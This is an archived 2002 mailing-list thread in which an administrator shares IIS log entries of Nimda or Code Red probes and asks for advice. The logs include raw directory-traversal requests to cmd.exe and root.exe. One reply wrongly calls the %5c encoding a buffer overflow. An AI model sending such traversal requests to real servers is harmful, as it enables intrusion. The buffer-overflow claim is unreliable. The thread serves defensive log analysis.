It is patched. Hey, I always keep my babies patched! :) One question though, I though that the "%5c" was the footprint of the "Double Decode" file traversal attack. Is it an attempted buffer overflow? Or, and my ignorance is showing here, is a file traversal and a buffer overflow the same thing? I know what a buffer overflow is. It was my impression that a file traversal was a flaw in the way IIS dealt with strings representing directory paths.
Jim Grossl Lee Pesky Learning Center Boise, Idaho USA -----Original Message----- From: Ravila White [mailto:[EMAIL PROTECTED]] Sent: Wednesday, January 16, 2002 11:35 AM To: Jim Grossl Subject: RE: IIS log files, can I have your take on these attacks? yeah...either nimda or code red you can tell from the MSADC and also see the buffer overflow "%5c" so the question is did you patch your server. When you go to MS security and find the info on this you will be told to nuke/wipe/format and start from scratch. This is a root level exploit. you can find more info on this at www.symantec.com or www.cert.com or www.sans.org after you rebuild please do the following: 1) bring the OS up to the latest service pack and hotfixes 2) Patch IIS appropriately 3) get the the microsoft security mailing list and the cert mailing list. thxs./rav -----Original Message----- From: Jim Grossl To: [EMAIL PROTECTED] Sent: 1/15/02 8:23 AM Subject: IIS log files, can I have your take on these attacks? 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:22 -0700] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 207.225.190.149 -- [14/Jan/2002:10:30:23 -0700] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 401 3837 207.225.190.149 - - [14/Jan/2002:10:30:25 -0700] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396 I kind of bothers me to post these on an open list (apparently our Web server doesn't need any more "attention") but I would like to know what everyone thinks of these attacks. My Web server logged > 2000 of these attacks over the weekend. I'm pretty sure that attacks are not succeeding, but I've read that if the "%5c" shows up in the Double Decode attack that the file traversal is taking place. Thanks. Jim Grossl
